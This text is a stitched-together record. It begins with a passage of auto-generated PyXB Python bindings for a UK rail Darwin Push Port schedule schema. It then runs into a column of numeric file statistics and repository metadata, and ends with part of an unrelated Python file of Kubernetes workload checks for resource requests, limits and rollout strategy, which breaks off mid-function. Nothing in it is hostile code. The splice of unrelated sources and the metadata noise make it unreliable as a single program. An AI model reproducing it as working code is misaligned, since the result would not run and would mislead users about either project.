trainId = property(__trainId.value, __trainId.set, None, 'Train ID (Headcode)')
# Attribute ssd uses Python identifier ssd
__ssd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ssd'), 'ssd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_ssd', _ImportedBinding_darwinpush_xb_ct.RTTIDateType, required=True)
__ssd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 292, 2)
__ssd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 292, 2)
ssd = property(__ssd.value, __ssd.set, None, 'Scheduled Start Date')
# Attribute toc uses Python identifier toc
__toc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'toc'), 'toc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_toc', _ImportedBinding_darwinpush_xb_ct.TOCType, required=True)
__toc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 297, 2)
__toc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 297, 2)
toc = property(__toc.value, __toc.set, None, 'ATOC Code')
# Attribute status uses Python identifier status
__status = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'status'), 'status', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_status', _ImportedBinding_darwinpush_xb_ct.CIFTrainStatusType, unicode_default='P')
__status._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 302, 2)
__status._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 302, 2)
status = property(__status.value, __status.set, None, 'Type of service, i.e. Train/Bus/Ship.')
# Attribute trainCat uses Python identifier trainCat
__trainCat = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'trainCat'), 'trainCat', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_trainCat', _ImportedBinding_darwinpush_xb_ct.CIFTrainCategoryType, unicode_default='OO')
__trainCat._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 307, 2)
__trainCat._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 307, 2)
trainCat = property(__trainCat.value, __trainCat.set, None, 'Category of service.')
# Attribute isPassengerSvc uses Python identifier isPassengerSvc
__isPassengerSvc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isPassengerSvc'), 'isPassengerSvc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isPassengerSvc', pyxb.binding.datatypes.boolean, unicode_default='true')
__isPassengerSvc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 312, 2)
__isPassengerSvc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 312, 2)
isPassengerSvc = property(__isPassengerSvc.value, __isPassengerSvc.set, None, 'True if Darwin classifies the train category as a passenger service.')
# Attribute isActive uses Python identifier isActive
__isActive = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isActive'), 'isActive', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isActive', pyxb.binding.datatypes.boolean, unicode_default='true')
__isActive._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 317, 2)
__isActive._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 317, 2)
isActive = property(__isActive.value, __isActive.set, None, 'Indicates if this service is active in Darwin. Note that schedules should be assumed to be inactive until a message is received to indicate otherwise.')
# Attribute deleted uses Python identifier deleted
__deleted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'deleted'), 'deleted', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_deleted', pyxb.binding.datatypes.boolean, unicode_default='false')
__deleted._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 322, 2)
__deleted._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 322, 2)
deleted = property(__deleted.value, __deleted.set, None, 'Service has been deleted and should not be used/displayed.')
# Attribute isCharter uses Python identifier isCharter
__isCharter = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isCharter'), 'isCharter', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isCharter', pyxb.binding.datatypes.boolean, unicode_default='false')
__isCharter._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 327, 2)
__isCharter._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 327, 2)
isCharter = property(__isCharter.value, __isCharter.set, None, 'Indicates if this service is a charter service.')
_ElementMap.update({
__OR.name() : __OR,
__OPOR.name() : __OPOR,
__IP.name() : __IP,
__OPIP.name() : __OPIP,
__PP.name() : __PP,
__DT.name() : __DT,
__OPDT.name() : __OPDT,
__cancelReason.name() : __cancelReason
})
_AttributeMap.update({
__rid.name() : __rid,
__uid.name() : __uid,
__trainId.name() : __trainId,
__ssd.name() : __ssd,
__toc.name() : __toc,
__status.name() : __status,
__trainCat.name() : __trainCat,
__isPassengerSvc.name() : __isPassengerSvc,
__isActive.name() : __isActive,
__deleted.name() : __deleted,
__isCharter.name() : __isCharter
})
Namespace.addCategoryObject('typeBinding', 'Schedule', Schedule)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DeactivatedSchedule with content type EMPTY
class DeactivatedSchedule (pyxb.binding.basis.complexTypeDefinition):
"""Notification that a Train Schedule is now deactivated in Darwin."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeactivatedSchedule')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 333, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute rid uses Python identifier rid
__rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DeactivatedSchedule_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
__rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 337, 2)
__rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 337, 2)
rid = property(__rid.value, __rid.set, None, 'RTTI unique Train ID')
_ElementMap.update({
})
_AttributeMap.update({
__rid.name() : __rid
})
Namespace.addCategoryObject('typeBinding', 'DeactivatedSchedule', DeactivatedSchedule)
Association._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'main'), AssocService, scope=Association, documentation='The through, previous working or link-to service', location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3)))
Association._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'assoc'), AssocService, scope=Association, documentation='The starting, terminating, subsequent working or link-from service', location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(Association._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'main')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(Association._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'assoc')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Association._Automaton = _BuildAutomaton()
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OR'), OR, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 267, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPOR'), OPOR, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 268, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IP'), IP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 269, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPIP'), OPIP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 270, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PP'), PP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 271, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DT'), DT, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 272, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPDT'), OPDT, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 273, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'cancelReason'), _ImportedBinding_darwinpush_xb_ct.DisruptionReasonType, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=2, max=None, metadata=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 266, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OR')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 267, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OPOR')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 268, 4))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'IP')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 269, 4))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OPIP')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 270, 4))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PP')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 271, 4))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'DT')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 272, 4))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OPDT')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 273, 4))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'cancelReason')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, True) ]))
st_7._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Schedule._Automaton = _BuildAutomaton_()
| 64.661278
| 366
| 0.759724
| 10,029
| 83,995
| 6.083259
| 0.049656
| 0.030094
| 0.052189
| 0.077497
| 0.860463
| 0.851481
| 0.826567
| 0.813749
| 0.786097
| 0.773886
| 0
| 0.017223
| 0.121436
| 83,995
| 1,298
| 367
| 64.711094
| 0.809513
| 0.097446
| 0
| 0.543665
| 1
| 0.00861
| 0.308549
| 0.240825
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00492
| false
| 0.00984
| 0.093481
| 0
| 0.429274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e28a1c30d65a0782e3e095321b214250b6d3147c
| 13,991
|
py
|
Python
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 5
|
2021-10-29T20:27:51.000Z
|
2022-02-15T21:20:12.000Z
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 10
|
2021-10-19T16:37:42.000Z
|
2022-01-28T22:55:47.000Z
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 2
|
2021-11-08T15:48:33.000Z
|
2021-11-08T16:32:04.000Z
|
from jsonpath_ng import jsonpath, parse
import yaml
from fractions import Fraction
def notApplicableCheck(workloadData):
return {'status': 'notApplicable', 'text': '', 'group': 'notApplicable'}
#end
def declarativeComponentCheck(workloadData):
retval = {'status': 'fail', 'text': workloadData['kind']}
if workloadData['kind'] in ['CronJob', 'DaemonSet', 'Deployment', 'StatefulSet', 'DeploymentConfig']:
retval['status'] = 'pass'
return retval
#end
def rollingUpdateCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
first = parse('spec.strategy.type').find(workloadData)
second = parse('spec.updateStrategy.type').find(workloadData)
if ((len(first) == 1) and ((first[0].value == "RollingUpdate") or (first[0].value == "Rolling"))):
retval['status'] = 'pass'
retval['text'] = first[0].value
elif ((len(second) == 1) and ((second[0].value == "RollingUpdate") or (second[0].value == "Rolling"))):
retval['status'] = 'pass'
retval['text'] = second[0].value
else:
retval['status'] ='warning'
retval['text'] = 'In most cases the spec.strategy.type or spec.updateStrategy.type should be either "Rolling" or "RollingUpdate". In stateful applications this not always possible.'
return retval
#end
def cpuRequestCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_cpu_requests = []
for container in workloadData['spec']['template']['spec']['containers']:
container_cpu_requests = container_cpu_requests + [{'container_name': container['name'], 'cpu_request': container['resources']['requests']['cpu']}]
retval['text'] = yaml.dump(container_cpu_requests)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU requests specified. All container specifications should include CPU requests"
return retval
#end
def memoryRequestCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].resources.requests.memory').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_memory_requests = []
for container in workloadData['spec']['template']['spec']['containers']:
container_memory_requests = container_memory_requests + [{'container_name': container['name'], 'memory_request': container['resources']['requests']['memory']}]
retval['text'] = yaml.dump(container_memory_requests)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory requests specified. All container specifications should include memory requests"
return retval
#end
def cpuLimitCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_cpu_limits = []
for container in workloadData['spec']['template']['spec']['containers']:
container_cpu_limits = container_cpu_limits + [{'container_name': container['name'], 'cpu_limit': container['resources']['limits']['cpu']}]
retval['text'] = yaml.dump(container_cpu_limits)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU limits specified. All container specifications should include CPU limits"
return retval
#end
def cpuLimitRequestRatio(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matchesLimit = parse('spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
matchesRequest = parse('spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
if ((len(matchesLimit)and len(matchesRequest)) > 0) and (len(matchesLimit) == numContainers):
for container in workloadData['spec']['template']['spec']['containers']:
numeric_filter = filter(str.isdigit, container['resources']['limits']['cpu'])
cpuLimit = int("".join(numeric_filter))
numeric_filter = filter(str.isdigit, container['resources']['requests']['cpu'])
cpuRequest = int("".join(numeric_filter))
retval['text'] = "Ratio: " + str(Fraction(cpuLimit, cpuRequest))
retval['status'] = 'pass'
if(float(cpuLimit / cpuRequest) > 3):
retval['status'] = 'warning'
else:
retval['status'] = 'fail'
retval['text'] = "could not find both a cpu limit and a cpu request"
return retval
#def
def memoryLimitCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].resources.limits.memory').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_memory_limits = []
for container in workloadData['spec']['template']['spec']['containers']:
container_memory_limits = container_memory_limits + [{'container_name': container['name'], 'memory_limit': container['resources']['limits']['memory']}]
retval['text'] = yaml.dump(container_memory_limits)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory limits specified. All container specifications should include memory limits"
return retval
#end
def cronjobCpuRequestCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
numContainers = len(workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_cpu_requests = []
for container in workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']:
container_cpu_requests = container_cpu_requests + [{'container_name': container['name'], 'cpu_request': container['resources']['requests']['cpu']}]
retval['text'] = yaml.dump(container_cpu_requests)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU requests specified. All container specifications should include CPU requests"
return retval
#end
def cronjobMemoryRequestCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.memory').find(workloadData)
numContainers = len(workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_memory_requests = []
for container in workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']:
container_memory_requests = container_memory_requests + [{'container_name': container['name'], 'memory_request': container['resources']['requests']['memory']}]
retval['text'] = yaml.dump(container_memory_requests)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory requests specified. All container specifications should include memory requests"
return retval
#end
def cronjobCpuLimitCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
numContainers = len(workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_cpu_limits = []
for container in workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']:
container_cpu_limits = container_cpu_limits + [{'container_name': container['name'], 'cpu_limit': container['resources']['limits']['cpu']}]
retval['text'] = yaml.dump(container_cpu_limits)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU limits specified. All container specifications should include CPU limits"
return retval
#end
def cronjobMemoryLimitCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.memory').find(workloadData)
numContainers = len(workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers'])
if (len(matches) > 0) and (len(matches) == numContainers):
retval['status'] = 'pass'
container_memory_limits = []
for container in workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']:
container_memory_limits = container_memory_limits + [{'container_name': container['name'], 'memory_limit': container['resources']['limits']['memory']}]
retval['text'] = yaml.dump(container_memory_limits)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory limits specified. All container specifications should include memory limits"
return retval
#end
def cronjobCpuLimitRequestRatio(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
